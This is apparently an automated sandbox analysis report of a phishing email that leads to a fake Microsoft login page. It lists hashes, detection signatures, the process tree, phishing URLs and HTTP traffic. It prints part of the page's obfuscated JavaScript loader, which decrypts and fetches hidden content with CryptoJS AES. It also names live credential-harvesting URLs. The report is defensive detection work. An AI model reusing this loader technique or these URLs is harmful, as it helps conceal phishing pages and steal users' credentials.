Edit tour

Windows Analysis Report
phishing.eml

Overview

General Information

Sample name:phishing.eml
Analysis ID:1649502
MD5:95b6a2d5927a959942e4e347d9fc1cd5
SHA1:2e2db93e97bb3656e04acb6c71bf1cb680330461
SHA256:70b6c9068a8412464676637a616769b701f3b08aaa506e83cf8f6c7deb8625bf
Infos:

Detection

Score:56
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
AI detected landing page (webpage, office document or email)
AI detected suspicious elements in Email content
Creates files inside the system directory
Deletes files inside the Windows folder
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found
Queries the volume information (name, serial number etc) of a device
Stores large binary data to the registry
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 7120 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\phishing.eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 2404 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "3FFE4162-6D4E-4D8B-8C6E-8324EE33DBF2" "767E59B5-AE85-4FE0-9A1B-DF37A468DC62" "7120" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 1480 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://blog.lenodal.com/exit.php?url=aHR0cHM6Ly9saW5rdHViZS5jb20vc3NmdWVscw==&entry_id=208 MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 6320 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1952,i,10921341807898213264,10042530571118757644,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6576 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://blog.lenodal.com/exit.php?url=aHR0cHM6Ly9saW5rdHViZS5jb20vc3NmdWVscw==&entry_id=208 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://apressa.com.br/offc/scg.html?utm_medium=social&utm_source=&utm_campaign=Access+with+Outlook+or+OfficeJoe Sandbox AI: Score: 7 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'apressa.com.br' does not match the legitimate domain for Microsoft., The domain 'apressa.com.br' does not have any known association with Microsoft., The URL does not contain any elements that suggest it is related to Microsoft, such as 'microsoft' in the domain name., The use of a Brazilian domain extension '.com.br' is unusual for a global brand like Microsoft unless it is a louserzed service, which should still be under a recognizable subdomain or domain. DOM: 1.6.pages.csv
Source: https://linktube.com/ssfuelsJoe Sandbox AI: Page contains button: 'Access with Outlook or Office' Source: '0.0.pages.csv'
Source: EmailJoe Sandbox AI: Detected potential phishing email: The email contains suspicious encoded URLs (blog.lenodal.com/exit.php) that redirect through multiple domains. The email is duplicated multiple times in the body, which is a common tactic in phishing attempts to bypass spam filters. The email prompts to view/download a PDF file with unusual formatting of the word 'File' as 'FiIe', a common phishing tactic
Source: https://apressa.com.br/offc/scg.html?utm_medium=social&utm_source=&utm_campaign=Access+with+Outlook+or+OfficeHTTP Parser: Number of links: 0
Source: https://apressa.com.br/offc/scg.html?utm_medium=social&utm_source=&utm_campaign=Access+with+Outlook+or+OfficeHTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://apressa.com.br/offc/scg.html?utm_medium=social&utm_source=&utm_campaign=Access+with+Outlook+or+OfficeHTTP Parser: Total embedded image size: 123322
Source: https://apressa.com.br/offc/scg.html?utm_medium=social&utm_source=&utm_campaign=Access+with+Outlook+or+OfficeHTTP Parser: Base64 decoded: function turnipeating(primacies) { var { a, b, c, d } = JSON.parse(primacies); var corgi = CryptoJS.PBKDF2(d, CryptoJS.enc.Utf8.parse(b), { hasher: CryptoJS.algo.SHA512, keySize: (32 + 16) / 4, iterations: 999 }); ...
Source: https://apressa.com.br/offc/scg.html?utm_medium=social&utm_source=&utm_campaign=Access+with+Outlook+or+OfficeHTTP Parser: Title: Sharing Link Validation does not match URL
Source: https://apressa.com.br/offc/scg.html?utm_medium=social&utm_source=&utm_campaign=Access+with+Outlook+or+OfficeHTTP Parser: Invalid link: Privacy & Cookies
Source: https://apressa.com.br/offc/scg.html?utm_medium=social&utm_source=&utm_campaign=Access+with+Outlook+or+OfficeHTTP Parser: (function anonymous() {function turnipeating(primacies) { var { a, b, c, d } = json.parse(primacies); var corgi = cryptojs.pbkdf2(d, cryptojs.enc.utf8.parse(b), { hasher: cryptojs.algo.sha512, keysize: (32 + 16) / 4, iterations: 999 }); const obscura = cryptojs.lib.wordarray.create(corgi.words.slice(0, 8)); const heliophilia = cryptojs.lib.wordarray.create(corgi.words.slice(8, 12)); let nephrectomise = cryptojs.aes.decrypt(a, obscura, { iv: heliophilia }); return cryptojs.enc.utf8.stringify(nephrectomise);}(async () => { document.open();/*t-bone pork chop leberkas quis. */ document. /*$kalimat2*/ write(turnipeating( /* primacies *//*hamburger jerky fugiat sed ullamco elit leberkas landjaeger enim ribeye dolore rump voluptate reprehenderit turducken. */ await ( /*frankfurter lorem shankle, sausage officia in excepteur minim. */await fetch(turnipeating(atob(`eyjhijoitmwxcukrzkrpzjrjekdgtg1vd1kyuenwnxo1enurrngxcvd1ahb...
Source: EmailClassification: Credential Stealer
Source: https://apressa.com.br/offc/scg.html?utm_medium=social&utm_source=&utm_campaign=Access+with+Outlook+or+OfficeHTTP Parser: <input type="password" .../> found
Source: https://linktube.com/ssfuelsHTTP Parser: No favicon
Source: https://linktube.com/ssfuelsHTTP Parser: No favicon
Source: https://apressa.com.br/offc/scg.html?utm_medium=social&utm_source=&utm_campaign=Access+with+Outlook+or+OfficeHTTP Parser: No favicon
Source: https://apressa.com.br/offc/scg.html?utm_medium=social&utm_source=&utm_campaign=Access+with+Outlook+or+OfficeHTTP Parser: No favicon
Source: https://apressa.com.br/offc/scg.html?utm_medium=social&utm_source=&utm_campaign=Access+with+Outlook+or+OfficeHTTP Parser: No favicon
Source: https://linktube.com/ssfuelsHTTP Parser: No favicon
Source: https://apressa.com.br/offc/scg.html?utm_medium=social&utm_source=&utm_campaign=Access+with+Outlook+or+OfficeHTTP Parser: No <meta name="author".. found
Source: https://apressa.com.br/offc/scg.html?utm_medium=social&utm_source=&utm_campaign=Access+with+Outlook+or+OfficeHTTP Parser: No <meta name="copyright".. found
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Source: unknownHTTPS traffic detected: 213.186.33.16:443 -> 192.168.2.16:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.186.33.16:443 -> 192.168.2.16:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.186.33.16:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.248.230.249:443 -> 192.168.2.16:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.248.230.249:443 -> 192.168.2.16:49728 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.248.230.249:443 -> 192.168.2.16:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.164.96.16:443 -> 192.168.2.16:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.1.195:443 -> 192.168.2.16:49737 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.248.230.249:443 -> 192.168.2.16:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.160.69.120:443 -> 192.168.2.16:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.1:443 -> 192.168.2.16:49748 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.160.69.120:443 -> 192.168.2.16:49752 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.65.228:443 -> 192.168.2.16:49755 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49758 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49757 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49760 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49764 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49765 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49773 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49772 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49774 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.241.77.32:443 -> 192.168.2.16:49775 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.241.77.32:443 -> 192.168.2.16:49776 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49784 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.248.230.249:443 -> 192.168.2.16:49783 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49785 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49792 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49795 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49796 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49794 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49797 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.84.118:443 -> 192.168.2.16:49798 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49807 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.84.118:443 -> 192.168.2.16:49806 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.16:49808 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.18.10.207:443 -> 192.168.2.16:49809 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.18.11.207:443 -> 192.168.2.16:49811 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.164.96.54:443 -> 192.168.2.16:49814 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.241.77.32:443 -> 192.168.2.16:49815 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.45.229:443 -> 192.168.2.16:49816 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.6.156:443 -> 192.168.2.16:49818 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.232.36.176:443 -> 192.168.2.16:49821 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.9.156:443 -> 192.168.2.16:49822 version: TLS 1.2
Source: unknownHTTPS traffic detected: 43.128.193.10:443 -> 192.168.2.16:49819 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.190.190.130:443 -> 192.168.2.16:49824 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.248.230.249:443 -> 192.168.2.16:49828 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.45.229:443 -> 192.168.2.16:49831 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.64.80.1:443 -> 192.168.2.16:49832 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.200.22.172:443 -> 192.168.2.16:49833 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.203.153.105:443 -> 192.168.2.16:49835 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.49.17.168:443 -> 192.168.2.16:49837 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.64.80.1:443 -> 192.168.2.16:49839 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.186.33.16:443 -> 192.168.2.16:49849 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.186.33.16:443 -> 192.168.2.16:49850 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49876 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49877 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49878 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49879 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49881 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49882 version: TLS 1.2
Source: chrome.exeMemory has grown: Private usage: 1MB later: 38MB
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.172
Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.99
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.172
Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.99
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /exit.php?url=aHR0cHM6Ly9saW5rdHViZS5jb20vc3NmdWVscw==&entry_id=208 HTTP/1.1Host: blog.lenodal.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ssfuels HTTP/1.1Host: linktube.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/5.13.0/css/fontawesome.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/5.13.0/css/solid.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/5.13.0/css/brands.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_nuxt/e114ae80e4b2d47f2989.js HTTP/1.1Host: linktube.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://linktube.com/ssfuelsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: auth.strategy=local; auth._token.local=false; auth._refresh_token.local=false
Source: global trafficHTTP traffic detected: GET /_nuxt/7db29c7d4236cabf432a.js HTTP/1.1Host: linktube.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://linktube.com/ssfuelsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: auth.strategy=local; auth._token.local=false; auth._refresh_token.local=false
Source: global trafficHTTP traffic detected: GET /_nuxt/fc61e2c5da5fa4b1ee14.js HTTP/1.1Host: linktube.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://linktube.com/ssfuelsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: auth.strategy=local; auth._token.local=false; auth._refresh_token.local=false
Source: global trafficHTTP traffic detected: GET /_nuxt/b6ccb04ec77bec22f317.js HTTP/1.1Host: linktube.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://linktube.com/ssfuelsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: auth.strategy=local; auth._token.local=false; auth._refresh_token.local=false
Source: global trafficHTTP traffic detected: GET /_nuxt/30e4908824f75617b76a.js HTTP/1.1Host: linktube.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://linktube.com/ssfuelsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: auth.strategy=local; auth._token.local=false; auth._refresh_token.local=false
Source: global trafficHTTP traffic detected: GET /storage/projects/12741/avatars/RotZvuHFZltAXAC1.png HTTP/1.1Host: api.linktube.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/5.13.0/webfonts/fa-brands-400.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveOrigin: https://linktube.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/brands.min.cssAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v3/ HTTP/1.1Host: js.stripe.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/factors.js HTTP/1.1Host: app.factors.aiConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /storage/projects/12741/avatars/RotZvuHFZltAXAC1.png HTTP/1.1Host: api.linktube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_nuxt/52bce4bcd71977610647.js HTTP/1.1Host: linktube.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://linktube.com/ssfuelsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: auth.strategy=local; auth._token.local=false; auth._refresh_token.local=false
Source: global trafficHTTP traffic detected: GET /_nuxt/85ae7cee2ddbc92082ce.js HTTP/1.1Host: linktube.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://linktube.com/ssfuelsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: auth.strategy=local; auth._token.local=false; auth._refresh_token.local=false
